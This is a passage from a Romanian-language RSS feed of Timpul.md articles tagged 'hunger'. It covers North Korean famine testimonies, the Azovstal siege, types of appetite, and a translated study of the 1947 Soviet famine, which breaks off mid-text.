<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>foame &#8211; Știri de ultimă oră din Moldova &#8211; Ultimele știri Timpul.md</title>
	<atom:link href="https://timpul.md/etichete/foame/feed" rel="self" type="application/rss+xml" />
	<link>https://timpul.md</link>
	<description>Citește știrile de ultimă oră de pe 🌍Timpul.md. Fii la curent cu ✔️Ultimele știri interne, ✔️externe, din ✔️sanatate, ✔️educatie, ✔️economice si ✔️ politice</description>
	<lastBuildDate>Thu, 15 Jun 2023 10:53:49 +0000</lastBuildDate>
	<language>ro-RO</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.5</generator>

<image>
	<url>https://timpul.md/wp-content/uploads/2025/02/favicon_Timpul-md.png</url>
	<title>foame &#8211; Știri de ultimă oră din Moldova &#8211; Ultimele știri Timpul.md</title>
	<link>https://timpul.md</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>„Suntem blocați aici, așteptând să murim”: Mărturii ale unor nord-coreeni care povestesc cum şi-au văzut vecinii murind de foame, în timp ce represiunea regimului a devenit mai dură ca niciodată</title>
		<link>https://timpul.md/articol/suntem-blocati-aici-asteptand-sa-murim-marturii-ale-unor-nord-coreeni-care-povestesc-cum-si-au-vazut-vecinii-murind-de-foame-in-timp-ce-represiunea-regimului-a-devenit-mai-dura-ca.html</link>
					<comments>https://timpul.md/articol/suntem-blocati-aici-asteptand-sa-murim-marturii-ale-unor-nord-coreeni-care-povestesc-cum-si-au-vazut-vecinii-murind-de-foame-in-timp-ce-represiunea-regimului-a-devenit-mai-dura-ca.html#comments</comments>
		
		<dc:creator><![CDATA[Timpul.md]]></dc:creator>
		<pubDate>Thu, 15 Jun 2023 10:53:43 +0000</pubDate>
				<category><![CDATA[Internațional]]></category>
		<category><![CDATA[Coreea de Nord]]></category>
		<category><![CDATA[foame]]></category>
		<category><![CDATA[mărturii]]></category>
		<category><![CDATA[moarte]]></category>
		<category><![CDATA[poveste]]></category>
		<category><![CDATA[represiune]]></category>
		<guid isPermaLink="false">https://timpul.md/?p=489934</guid>

					<description><![CDATA[BBC&#160;a intervievat în secret trei oameni obişnuiţi din Coreea de Nord, cu ajutorul organizaţiei Daily NK, care operează o reţea de surse în cea mai izolată ţară din lume. Mărturiile lor arată că în ţară are loc o „tragedie devastatoare”, iar oamenii se tem că vor muri de foame sau că vor fi executaţi, transmite &#8230;]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph"><strong><a href="https://www.bbc.co.uk/news/extra/bskbb4rmae/inside-north-korea">BBC</a>&nbsp;a intervievat în secret trei oameni obişnuiţi din Coreea de Nord, cu ajutorul organizaţiei Daily NK, care operează o reţea de surse în cea mai izolată ţară din lume. Mărturiile lor arată că în ţară are loc o „tragedie devastatoare”, iar oamenii se tem că vor muri de foame sau că vor fi executaţi, transmite <a href="https://www.g4media.ro/suntem-blocati-aici-asteptand-sa-murim-marturii-ale-unor-nord-coreeni-care-povestesc-cum-si-au-vazut-vecinii-murind-de-foame-in-timp-ce-represiunea-regimului-a-devenit-mai-dura-ca-niciodata.html">G4media.ro.</a></strong></p>



<p class="wp-block-paragraph">Interviurile exclusive sugerează că este cea mai gravă situaţie din anii 1990 încoace, sunt de părere experţii. Regimul de la Phenian a închis graniţele ţării în 2020, tăind surse vitale de aprovizionare. De asemenea, a înăsprit controlul asupra vieţii oamenilor, spun martorii intervievaţi.</p>



<p class="wp-block-paragraph">Locuitorii din Coreea de Nord au declarat pentru BBC că hrana este atât de rară, încât şi-au văzut efectiv vecinii murind de foame.</p>



<p class="wp-block-paragraph">O femeie care locuieşte în capitala Phenian a povestit că a cunoscut o familie de trei persoane care a murit de foame acasă. „Am bătut la uşa lor pentru a le da apă, dar nu a răspuns nimeni”, a spus Ji Yeon. Când autorităţile au intrat înăuntru, i-au găsit morţi, a spus ea. (Numele real al lui Ji Yeon a fost schimbat pentru a o proteja, la fel ca şi ale celorlalţi martori intervievaţi).</p>



<p class="wp-block-paragraph">Femeia susţine că a auzit de oameni care s-au sinucis acasă sau au dispărut în munţi ca să moară, pentru că nu mai puteau să-şi câştige existenţa. Ea mărturiseşte că poate cu greu să-şi hrănească copiii. Odată, a stat două zile fără să mănânce şi a crezut că va muri în somn.</p>



<p class="wp-block-paragraph">Şi un muncitor în construcţii care locuieşte în apropiere de graniţa cu China, pe care BBC îl numeşte Chan Ho, a spus că hrana este atât de greu de găsit, încât cinci persoane din satul său au murit deja de foame. „La început, mi-a fost teamă să nu mor de Covid, dar apoi am început să mă îngrijorez că voi muri de foame”, a spus el.</p>



<p class="has-medium-font-size wp-block-paragraph"><strong>CONTRABANDA CU ALIMENTE A DEVENIT IMPOSIBILĂ</strong></p>



<p class="wp-block-paragraph">Coreea de Nord nu a fost niciodată capabilă să producă suficientă hrană pentru cei 26 de milioane de locuitori ai săi. Când şi-a închis graniţa, în ianuarie 2020, autorităţile au încetat să mai importe cereale din China, precum şi îngrăşăminte şi utilaje necesare pentru a cultiva alimente.</p>



<p class="wp-block-paragraph">Între timp, autorităţile au fortificat frontiera cu garduri, în timp ce, potrivit relatărilor, au ordonat grănicerilor să împuşte pe oricine încearcă să treacă. Acest lucru face aproape imposibilă introducerea ilegală de alimente pentru a le vinde pe sub mână. Majoritatea nord-coreenilor aşa îşi făceau cumpărăturile.</p>



<p class="wp-block-paragraph">O vânzătoare dintr-o piaţă din nordul ţării, numită Myong Suk, a spus că aproape trei sferturi din produsele pieţei proveneau din China, dar aceasta este „goală acum”. Ea, ca şi alţii care îşi câştigă existenţa vânzând produse de contrabandă aduse de peste graniţă, şi-a pierdut aproape toate veniturile din care trăia. Familia ei nu a avut niciodată atât de puţin de mâncare şi spune că, recent, oamenii au bătut la uşa ei cerându-i mâncare pentru că le era foarte foame.</p>



<p class="has-medium-font-size wp-block-paragraph"><strong>ÎN LOC DE MÂNCARE, KIM JONG UN FACE TESTE COSTISITOARE CU RACHETE</strong></p>



<p class="wp-block-paragraph">La sfârşitul anilor 1990, Coreea de Nord a trecut printr-o foamete devastatoare care a ucis până la trei milioane de oameni. Zvonurile recente despre foamete, pe care aceste interviuri le confirmă, au provocat temeri că ţara ar putea fi în pragul unei noi catastrofe.</p>



<p class="wp-block-paragraph">Chiar şi liderul nord-coreean Kim Jong Un a făcut aluzie la gravitatea situaţiei – la un moment dat s-a referit în mod deschis la o „criză alimentară”, făcând în acelaşi timp diverse încercări de a stimula producţia agricolă. În ciuda acestui fapt, el a acordat prioritate finanţării programului său de arme nucleare, testând 63 de rachete balistice în 2022, un număr record. O estimare plasează costul total al acestor teste la peste 500 de milioane de dolari – mai mult decât suma necesară pentru a compensa deficitul anual de cereale al Coreei de Nord.</p>



<p class="has-medium-font-size wp-block-paragraph"><strong>„SUNTEM BLOCAŢI AICI, AŞTEPTÂND SĂ MURIM”</strong></p>



<p class="wp-block-paragraph">Persoanele intervievate de BBC au dezvăluit, de asemenea, modul în care guvernul s-a folosit de pandemie pentru a-şi spori în ultimii trei ani controlul asupra vieţii oamenilor, prin înăsprirea pedepselor şi adoptarea de noi legi.</p>



<p class="wp-block-paragraph">Înainte de pandemie, peste 1.000 de persoane fugeau din ţară în fiecare an, traversând râul Yalu spre China, potrivit cifrelor publicate de guvernul sud-coreean. Acum, e imposibil să scapi, spune Myong Suk. „Şi dacă te apropii de râu vei primi o pedeapsă aspră, aşa că aproape nimeni nu-l mai traversează”, a spus ea.</p>



<p class="wp-block-paragraph">Muncitorul în construcţii Chan Ho a declarat că fiul prietenului său a fost recent martor la mai multe execuţii secrete. De fiecare dată, trei-patru persoane au fost ucise pentru că încercaseră să fugă din ţară. „În fiecare zi devine tot mai greu să trăieşti”, spune el. „O singură mişcare greşită şi te confrunţi cu execuţia. Suntem blocaţi aici aşteptând să murim”, a declarat Chan Ho.</p>



<p class="has-medium-font-size wp-block-paragraph"><strong>O COREE DE NORD MAI REPRESIVĂ CA NICIODATĂ</strong></p>



<p class="wp-block-paragraph">De mai bine de trei ani, Coreea de Nord şi-a sigilat graniţele. Oamenii au interdicţie de a părăsi sau de a intra în ţară. Aproape toţi străinii care se aflau înăuntru şi-au făcut bagajele şi au plecat. Cel mai secretos şi tiranic stat din lume este acum o gaură neagră din punct de vedere al informaţiilor. Timp de luni de zile, cele trei persoane din interiorul Coreei de Nord şi-au riscat viaţa pentru a relata pentru BBC ce se întâmplă.</p>



<p class="wp-block-paragraph">Guvernul nord-coreean, solicitat să-şi spună punctul de vedere, spune că „a acordat întotdeauna prioritate intereselor poporului, chiar şi în momentele dificile”.</p>



<p class="wp-block-paragraph">„Bunăstarea poporului este principala noastră prioritate, chiar şi în faţa încercărilor şi provocărilor”, a declarat un reprezentant al Ambasadei nord-coreene la Londra. Oficialii nord-coreeni au mai spus că informaţiile „nu sunt în întregime reale”, susţinând că au fost „extrase din mărturii fabricate de forţele anti-RPD Coreeană (Republica Populară Democrată Coreeană)”.</p>



<p class="wp-block-paragraph">Sokeel Park, de la Liberty in North Korea (LiNK), o organizaţie care sprijină fugarii nord-coreeni, spune că aceste interviuri dezvăluie o „triplă lovitură” pentru nord-coreeni: „Situaţia alimentară a devenit mai dificilă, oamenii au mai puţină libertate de a se descurca singuri şi a devenit aproape imposibil de fugit din ţară”. Coreea de Nord este acum mai represivă decât a fost vreodată, spune Park.</p>



<p class="has-medium-font-size wp-block-paragraph"><strong>EXECUTAŢI DACĂ ASCULTĂ CÂNTECE STRĂINE</strong></p>



<p class="wp-block-paragraph">În Phenian, Ji Yeon spune că supravegherea şi represiunea sunt acum atât de severe, încât oamenii nu mai au încredere unii în alţii. Ea a fost luată pentru interogatoriu în temeiul unei noi legi, adoptată în decembrie 2020, care interzice oamenilor să împărtăşească şi să se uite la filme, emisiuni TV şi să asculte cântece străine. În temeiul acestei „Legi de respingere a ideologiei reacţionare şi a culturii, care vizează eradicarea informaţiilor străine”, cei prinşi distribuind conţinut sud-coreean, de pildă, pot fi executaţi.</p>



<p class="wp-block-paragraph">Un fost diplomat nord-coreean, care a dezertat în 2019, a declarat că a fost şocat de cât de extremă a devenit reprimarea influenţei străine. „Kim Jong Un se teme că dacă oamenii înţeleg situaţia în care se află şi cât de bogată este Coreea de Sud, vor începe să-l urască şi se vor revolta”, crede Ryu Hyun Woo.</p>



<p class="wp-block-paragraph">Interviurile BBC sugerează că loialitatea faţă de lider a unor oameni a scăzut în ultimii trei ani. „Înainte de Covid, oamenii îl priveau pe Kim Jong Un în mod pozitiv”, a declarat Myong Suk. „Acum, aproape toată lumea este plină de nemulţumire”, susţine femeia din Coreea de Nord.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/suntem-blocati-aici-asteptand-sa-murim-marturii-ale-unor-nord-coreeni-care-povestesc-cum-si-au-vazut-vecinii-murind-de-foame-in-timp-ce-represiunea-regimului-a-devenit-mai-dura-ca.html/feed</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>„Strategia” lui Putin asupra complexului Azovstal: Luptătorii ucraineni lăsați să moară de foame până se predau?</title>
		<link>https://timpul.md/articol/strategia-lui-putin-asupra-complexului-azovstal-luptatorii-ucraineni-lasati-sa-moara-de-foame-pana-se-predau.html</link>
					<comments>https://timpul.md/articol/strategia-lui-putin-asupra-complexului-azovstal-luptatorii-ucraineni-lasati-sa-moara-de-foame-pana-se-predau.html#respond</comments>
		
		<dc:creator><![CDATA[Ioana Crețu]]></dc:creator>
		<pubDate>Thu, 21 Apr 2022 11:18:52 +0000</pubDate>
				<category><![CDATA[Actualitate]]></category>
		<category><![CDATA[foame]]></category>
		<category><![CDATA[război]]></category>
		<category><![CDATA[ruși]]></category>
		<category><![CDATA[strategie]]></category>
		<category><![CDATA[ucraineni]]></category>
		<guid isPermaLink="false">https://timpul.md/?p=389742</guid>

					<description><![CDATA[De când Vladimir Putin a început a invada Ucraina, cucerirea orașului-port Mariupol a fost considerată crucială, pentru că ea asigură trupelor rusești un culoar între peninsula Crimeea (anexată în 2014) și Donbas (regiunile separatiste din estul Ucrainei). Joi, rușii au clamat cucerirea orașului, însă, într-o acțiune de PR televizată de media rusești, Putin anunța că &#8230;]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph" id="1"><strong>De când Vladimir Putin a început a invada Ucraina, cucerirea orașului-port Mariupol a fost considerată crucială, pentru că ea asigură trupelor rusești un culoar între peninsula Crimeea (anexată în 2014) și Donbas (regiunile separatiste din estul Ucrainei). Joi, rușii au clamat cucerirea orașului, însă, într-o acțiune de PR televizată de media rusești, Putin anunța că a ordonat încetarea asatului asupra complexului Azovstal unde s-au refugiat ultimii luptători ucraineni, scrie <a href="https://www.hotnews.ro/stiri-razboi_ucraina-25510835-strategia-lui-putin-cazul-azovstal-luptatorii-ucraineni-lasati-moara-foame-pana-predau.htm">Hotnews.ro</a></strong>.</p>



<p class="wp-block-paragraph" id="2">Săptămâni întregi rușii au încercat să cucerească orașul asediat și distrus în mare parte, lovindu-se de rezistența ucrainenilor. Motiv de frustrare pentru Vladimir Putin și generalii săi, notează BBC.</p>



<p class="wp-block-paragraph" id="3">Bombardamentele intense au cauzat o adevărată catastrofă umanitară, civilii fiind captivi în oraș, operațiunile de evacuare fiind adesea sabotate de atacurile rusești.</p>



<p class="wp-block-paragraph" id="4">De la sfârșitul săptămânii trecute și până marți, mai multe ultimatumuri au fost lansate de ruși iar Moscova anunța că va cruța viețile soldaților ucraineni de la Azovstal, dacă depun armele.</p>



<p class="wp-block-paragraph" id="5">Soldații, deși încercuiți din toate părțile și rămași fără armament și muniții, nu s-au predat. Rusia se lăuda marți cu 5 persoane care ar fi răspuns ultimatumului. În schimb, luptătorii au lansat apeluri disperate la Occident pentru a fi extrași, afirmând că își trăiesc ultimele zile din viață.</p>



<p class="wp-block-paragraph" id="6">Mișcarea de joi anunțată de Kremlin indică faptul că Moscova și-a schimbat tactica, optând pentru scenariul în care ultimii luptători sunt lăsați să moară de foame până se predau treptat, relatează BBC.</p>



<p class="wp-block-paragraph" id="7">Desigur, există și posibilitatea ca rușii să le ofere șansa de a fi evacuați.</p>



<p class="wp-block-paragraph" id="8">Vicepremierul Ucrainei a făcut apel la deschiderea de urgență a unui cordon umanitar pentru civilii care sunt și ei prinși în Mariupol. O cerere similiară lansată marți a dus la evacuarea a 6.000 de oameni, cu 4 autobuze.</p>



<p class="wp-block-paragraph" id="9">Evacuarea nu a putut fi finalizată pentru că, spune Kievul, rușii nu și-au putut controla trupele care au continuat atacurile.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/strategia-lui-putin-asupra-complexului-azovstal-luptatorii-ucraineni-lasati-sa-moara-de-foame-pana-se-predau.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zece feluri de FOAME și cum le poți controla</title>
		<link>https://timpul.md/articol/zece-feluri-de-foame-si-cum-le-poti-controla-62876.html</link>
					<comments>https://timpul.md/articol/zece-feluri-de-foame-si-cum-le-poti-controla-62876.html#respond</comments>
		
		<dc:creator><![CDATA[Timpul.md]]></dc:creator>
		<pubDate>Thu, 02 Sep 2021 04:02:00 +0000</pubDate>
				<category><![CDATA[Sănătate]]></category>
		<category><![CDATA[foame]]></category>
		<category><![CDATA[mancare]]></category>
		<category><![CDATA[senzatie]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/zece-feluri-de-foame-si-cum-le-poti-controla-62876.html/</guid>

					<description><![CDATA[<strong>Deşi pare cea mai obişnuită senzaţie din lume, foame este totuşi, din multe puncte de vedere, un fenomen misterios. Implică at&#226;t aspecte fiziologice, c&#226;t şi psihologice şi, datorită acestei varietăţi de factori, este adesea dificil de controlat. Primul pas este identificarea elementului care declanşează nevoia sau dorinţa de a m&#226;nca.</strong><br />]]></description>
										<content:encoded><![CDATA[<p><strong>1. Foamea adevărată<br />
</strong>Este cel mai important tip, deoarece &bdquo;spune&rdquo; organismului c&acirc;nd ar fi cazul să măn&acirc;nce. Se poate uneori manifesta fizic, prin tremurături, &#8211; din cauza scăderii glicemiei -, dureri de cap, nivel scăzut al energiei şi binecunoscutele &bdquo;chiorăieli&rdquo; ale stomacului, explică psihologul Susan Albers, autoarea cărţii  EatQ. &Icirc;n asemenea situaţii, &icirc;ţi vine să măn&acirc;nci orice ai la &icirc;ndem&acirc;nă şi poţi face alegeri nepotrivite. Fii pregătit, ţin&acirc;nd la &icirc;ndem&acirc;nă nişte gustări sănătoase.</p>
<p><strong>2. Foamea &bdquo;TV&rdquo;<br />
</strong>Mulţi oameni simt nevoia să măn&acirc;nce &icirc;n timp ce se uită la televizor, iar un studiu din 2013 (American Journal of Clinical Nutrition) arată că distragerea atenţiei de la m&acirc;ncare &icirc;i poate face să măn&acirc;nce mai mult dec&acirc;t dacă nu s-ar uita la TV. G&acirc;ndeşte-te să măn&acirc;nci &icirc;nainte de a te aşeza la televizor; &icirc;n timp ce te uiţi, fă altceva cu m&acirc;inile &ndash; tricotează, plăteşte facturi &ndash; şi nu te uita la reclame (ca să nu te ducă &icirc;n ispită imaginile cu alimente), sugerează Susan Albers.</p>
<p><strong>3. Foamea de plictiseală<br />
</strong>Te plictiseşti, nu ştii ce să faci; atunci te duci să te uiţi &icirc;n frigider şi&hellip; sf&acirc;rşeşti prin a m&acirc;nca. Plictiseala e ceva cu care avem cu toţii de-a face, spune Susan Albers; e bine să &icirc;nvăţăm să o suportăm, &icirc;n loc să cedăm reflexului de a o combate m&acirc;nc&acirc;nd.</p>
<p>&Icirc;ncercaţi să transformaţi momentele de plictiseală &icirc;n momente de relaxare. La nevoie, recomandă psihologul, faceţi o listă: 5  moduri simple de a vă relaxa (citiţi o revistă, m&acirc;ng&acirc;iaţi căţelul), 5 locuri &icirc;n care vă puteţi duce pentru a vă simţi &icirc;n largul vostru (pe verandă, &icirc;ntr-o cameră liniştită) sau 5 persoane cu care puteţi sta de vorbă (o soră, un prieten bun etc.) C&acirc;nd apare plictiseala, recurgeţi la listă şi găsiţi ceva plăcut de făcut.</p>
<p><strong>4. Foamea &bdquo;de nervi&rdquo;<br />
</strong>Apare atunci c&acirc;nd, din cauza scăderii glicemiei, intraţi &icirc;ntr-o stare de iritare şi nu mai g&acirc;ndiţi clar. Unii oameni au asemenea manifestări, devenind foarte nervoşi c&acirc;nd le e foame.</p>
<p>E o problemă care ar trebui să fie controlată, deoarece poate afecta relaţiile, viaţa de familie: cercetări recente (la Ohio State University) au arătat că oamenii căsătoriţi care prezentau niveluri mai scăzute ale glucozei &icirc;n s&acirc;nge (glicemia) aveau şanse mai mari de a se manifesta agresiv faţă de partenerul de viaţă. </p>
<p>Deşi, &icirc;n asemenea, cazuri, există tendinţa de a m&acirc;nca rapid ceva dulce, pentru a ridica glicemia, e mai bine să &icirc;nvăţaţi să recunoaşteţi problema şi să o combateţi cu ajutorul unor carbohidraţi sănătoşi (un fruct sau c&acirc;ţiva biscuţi ne&icirc;ndulciţi, din făină integrală).</p>
<p><strong>5. Foamea de după-amiază<br />
</strong>La serviciu, pe la ora 3 după-masă, c&acirc;nd scade nivelul de energie, mulţi simt nevoia să meargă să-şi cumpere ceva de m&acirc;ncare (şi adesea &icirc;şi iau ceva dulce).</p>
<p>Dr. Michelle May, specialist &icirc;n nutriţie, recomandă să anticipăm aceste situaţii şi să ne pregătim pentru ele, ţin&acirc;nd la &icirc;ndem&acirc;nă o provizie de gustări bogate &icirc;n proteine: nuci şi alune, mici porţii de br&acirc;nză, iaurt simplu. Proteinele &bdquo;ţin de foame&rdquo; p&acirc;nă la ora mesei de seară şi ne ajută să m&acirc;ncăm mai puţin la cină. </p>
<p><strong>6. Foamea de stres<br />
</strong>C&acirc;nd suntem stresaţi, avem tendinţa de a fi mai puţin pretenţioşi la m&acirc;ncare, spune Susan Albers, aşa că e mai probabil să m&acirc;ncăm ceva nesănătos. </p>
<p>&Icirc;n afara tehnicilor de reducere a stresului, iată &icirc;ncă o recomandare: să ne oprim şi să ne concentrăm asupra beneficiilor pe care le-am avea dacă alegem o gustare sănătoasă &ndash; de pildă, scăderea &icirc;n greutate sau scăderea tensiunii arteriale. Acest lucru ajută creierul să depăşească nevoia stringentă de a m&acirc;nca ceva nesănătos pentru combaterea stresului, arată un studiu publicat &icirc;n 2014 &icirc;n Journal of Consumer Psychology.</p>
<p><strong>7. Foamea asociată cu sindromul premenstrual<br />
</strong>O problemă specifică femeilor: schimbările hormonale care survin cu căteva zile &icirc;nainte de menstruaţie pot declanşa o foame mai accentuată şi pofte alimentare care nu vizează, de obicei, m&acirc;ncăruri prea sănătoase.</p>
<p>Nu e cazul să vă lipsiţi de m&acirc;ncare &icirc;n aceste momente, spun specialiştii. Puteţi m&acirc;nca un pic mai mult; după menstruaţie, c&acirc;nd vă veţi regăsi echilibrul hormonal, vă veţi regăsi şi echilibrul alimentar.</p>
<p><strong>8. Foamea care e doar &icirc;n mintea ta<br />
</strong>Nu eşti nici  obosit, nici flăm&acirc;nd; totuşi, parcă vrei să măn&acirc;nci ceva. &Icirc;n asemenea cazuri, &icirc;ncearcă să dai de rădăcina problemei. &bdquo;&Icirc;ntreabă-te: ce vreau de la m&acirc;ncare?&rdquo;, spune Minh-Hai Alex, din cadrul Mindful Nutrition Seattle.</p>
<p>Poate că, de fapt, &icirc;ncerci să am&acirc;ni să lucrezi la o sarcină de serviciu, sau vrei o pauză, iar a m&acirc;nca te-ar face să simţi că faci totuşi ceva. Dar e preferabil să foloseşti asemenea momente pentru a te hotăr&icirc; dacă &icirc;ntr-adevăr vrei să măn&acirc;nci sau vrei altceva. </p>
<p><strong>9. Foamea care e, de fapt, doar un prilej  <br />
</strong>De fapt, nu ţi-e foame, ci doar ai o ocazie să măn&acirc;nci ceva. Intri &icirc;ntr-o cameră, găseşti o tăviţă cu fursecuri rămase de la pr&acirc;nz şi, dacă tot sunt acolo, iei şi tu.</p>
<p>Stai un moment, &icirc;nainte de a face asta, recomandă Minh-Hai Alex; astfel, &icirc;ntrerupi obiceiul automat de a m&acirc;nca atunci c&acirc;nd vezi ceva de m&acirc;ncare la &icirc;ndem&acirc;nă, fără ca măcar să te g&acirc;ndeşti sau să savurezi alimentul respectiv. Sentimentul de vină te poate face să-l &icirc;nghiţi rapid, fără să te bucuri de el. G&acirc;ndeşte-te o clipă, apoi decide-te: măn&acirc;nci sau nu. Dacă iei un fursec, măcar măn&acirc;ncă-l &icirc;ncet şi savurează-l. </p>
<p>Şi ia &icirc;n considerare şi asta: un fursec, din c&acirc;nd &icirc;n c&acirc;nd, n-o să te &icirc;ngraşe, dar dacă măn&acirc;nci c&acirc;te trei deodată, zilnic, &icirc;n afara meselor tale obişnuite, s-ar putea să iei &icirc;n greutate.</p>
<p><strong>10. Foamea &bdquo;sărbătorească&rdquo;<br />
</strong>E vorba despre ocaziile speciale &ndash; o ieşire la restaurant, o masă cu familia sau prietenii &ndash; , &icirc;n jurul unor alimente precum pizza, tort etc.</p>
<p>E un lucru bun, deoarece hrana are o capacitate excepţională de a apropia oamenii, spune Michelle May. </p>
<p>Problema apare doar atunci c&acirc;nd nu mai vezi niciun alt mod de a sărbători ceva dec&acirc;t cu multă m&acirc;ncare.</p>
<p>Femeile, de pildă, pot &icirc;nlocui &icirc;nt&acirc;lnirea cu o prietenă la bar (pentru băuturi şi aperitive, cu multe calorii) printr-o plimbare sau o tură prin magazine, sau pot sărbători o aniversare printr-o şedinţă de tratement cosmetic, care are şi ea capacitatea de a  le face să se simtă bine.</p>
<p><strong>descoperă.ro</strong></p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/zece-feluri-de-foame-si-cum-le-poti-controla-62876.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>(DOCUMENT) Traducere din Cambridge Journal of Economics: FOAMETEA SOVIETICĂ din 1947</title>
		<link>https://timpul.md/articol/document-traducere-din-cambridge-journal-of-economics-foametea-sovietica-din-1947-47262.html</link>
					<comments>https://timpul.md/articol/document-traducere-din-cambridge-journal-of-economics-foametea-sovietica-din-1947-47262.html#respond</comments>
		
		<dc:creator><![CDATA[Timpul.md]]></dc:creator>
		<pubDate>Thu, 19 Aug 2021 05:07:00 +0000</pubDate>
				<category><![CDATA[Istorie]]></category>
		<category><![CDATA[1947]]></category>
		<category><![CDATA[cambridge]]></category>
		<category><![CDATA[economie]]></category>
		<category><![CDATA[foame]]></category>
		<category><![CDATA[moldova]]></category>
		<category><![CDATA[rssm]]></category>
		<category><![CDATA[urss]]></category>
		<category><![CDATA[victoria colesnic]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/document-traducere-din-cambridge-journal-of-economics-foametea-sovietica-din-1947-47262.html/</guid>

					<description><![CDATA[O deosebită atenție &#238;n ultimii 20 de ani a fost acordată aspectelor economice ale foametei.&#160;&#160;]]></description>
										<content:encoded><![CDATA[<p>Amartya Kumar Sen, renumitul economist indian, a abordat această problemă dintr-o nouă perspectivă, numită &bdquo;entitlement approach&rdquo;, ceea ce a trezit un interes major și a constituit o considerabilă inovație intelectuală. Economistul consideră că foametea este cauzată de eșecul de a transforma resursele (păm&acirc;nt, echipament, viețuitoare, cunoștințe) &icirc;n bunuri și servicii. [&hellip;]</p>
<p>Această manieră de a ancora problema foametei a fost preluată dintr-un studiu de caz realizat de Sen privind foametea bengaleză din 1943. Un aspect important al muncii lui Sen era să explice că reducerea hranei disponibile nu este singura cauză a foametei și foametea se poate petrece chiar și atunci c&acirc;nd sunt suficiente alimente. Publicarea unor documente secrete din arhivă au scos la iveală o foamete necunoscută anterior, foametea sovietică din 1947. P&acirc;nă nu demult, foametea sovietică din 1947 a fost pe larg dezmințită at&acirc;t &icirc;n literatura de specialitate, c&acirc;t și &icirc;n istoria demografică a Uniunii Sovietice. Foametea sovietică din 1947 a fost un eveniment tragic și important, iar acest studiu de caz &icirc;și propune să găsească un răspuns la &icirc;ntrebarea: a fost sau nu această foamete cauzată de insuficiența hranei. </p>
<h1>Date istorice</h1>
<p>Foametea sovietică din 1947 a avut loc după un devastator război &icirc;n care URSS a pierdut 24-27 milioane de oameni. Aceasta a avut loc &icirc;ntr-o țară &icirc;n care se &icirc;nt&acirc;mplaseră deja trei fenomene similare &icirc;n secolul XX (1917-1922, 1931-1934 și 1941-1945), guvernată de un tiran ce-și considera populația o masă de dușmani &icirc;nvinși, obligați să plătească tribut conducătorului. Foametea a fost precedată de o secetă ce a redus &icirc;n mod incomparabil cantitatea de gr&acirc;ne recoltată (Tabelul 1). &Icirc;n 1946 s-a &icirc;nregistrat o scădere semnificativă a producției de gr&acirc;ne, cauzată de secetă, scădere ce se producea de la un nivel deja cobor&acirc;t. Povara a căzut pe spatele fermierilor, &icirc;ntruc&acirc;t o mai mică parte a producției a rămas la dispoziția fermelor și a populației rurale. </p>
<p><img fetchpriority="high" decoding="async" src="/uploads/images/1(66).jpg" width="600" height="290" alt="" /></p>
<p>
&nbsp;<img decoding="async" src="/uploads/images/2(72).jpg" width="600" height="342" alt="" /><br />
&nbsp;<img decoding="async" src="/uploads/images/3(66).jpg" width="600" height="387" alt="" /><br />
<img loading="lazy" decoding="async" src="/uploads/images/4(44).jpg" width="600" height="225" alt="" /></p>
<p>Pentru a vedea ce s-a &icirc;nt&acirc;mplat cu gr&acirc;nele &icirc;n m&acirc;inile statului, este necesar să analizăm balanța gr&acirc;nelor pentru anii 1945-1948, reflectată &icirc;n tabelul 2. Se poate observa că &icirc;n 1946 exportul de gr&acirc;ne constituia un milion de tone, &icirc;n timp ce cantitatea de 0.4 tone a fost vărsată &icirc;n rezerva de stat și 2.4 mln. tone au fost destinate fermelor colective și de stat &icirc;n calitate de &icirc;mprumut (adică, gr&acirc;nele se utilizează drept săm&acirc;nță și este returnat statului după recoltare). &Icirc;n 1947, exportul de gr&acirc;ne a căzut la  0.3 mln. tone, iar cantitățile destinate rezervelor de stat și &icirc;mprumuturilor au crescut p&acirc;nă la 3.1 milioane de tone. Această sporire a &icirc;mprumuturilor sub formă de săm&acirc;nță denotă dependența statului de o producție agricolă continuă. Declinul brusc al exporturilor din 1947 a fost un răspuns al guvernului la foamete.</p>
<p>&Icirc;n vederea &icirc;nțelegerii dacă foametea sovietică din 1947 a fost una cauzată de lipsa hranei sau nu, este important să urmărim datele privind stocurile din acea perioadă.<strong> Acest fapt se datorează URSS, care a avut o economie de stat, pentru care stocurile de gr&acirc;ne erau de o mare importanță și unde agențiile de stat păstrau minuțios &icirc;nregistrările tuturor tranzacțiilor. </strong>Datele disponibile sunt redate &icirc;n tabelele 3 și 4. &Icirc;n primul r&acirc;nd, &icirc;n anii 1947-1953, guvernul sovietic a reușit să obțină ceea ce părea de neatins &icirc;n 1929-1933 &ndash; o majoră creștere a rezervelor de gr&acirc;ne. Acest spor a &icirc;nceput cu recolta anului 1947. Care a fost scopul? Potrivit decretului secret (<em>soverșenno secretno</em>), din 11 iulie 1947 al Consiliului miniștrilor din Ucraina și al Comitetului Central al Partidului Comunist al Ucrainei privind planul de aprovizionare cu gr&acirc;ne din recolta anului 1947, obiectivele au fost &icirc;mpărțite. Acestea &icirc;și propuneau să continue producerea agricolă, &icirc;n pofida secetei din anul precedent (prin garantarea unei cantități adecvate de săm&acirc;nță și hrană pentru cei angajați &icirc;n semănatul de primăvară și recolta ulterioară), să colecteze gr&acirc;ne de la 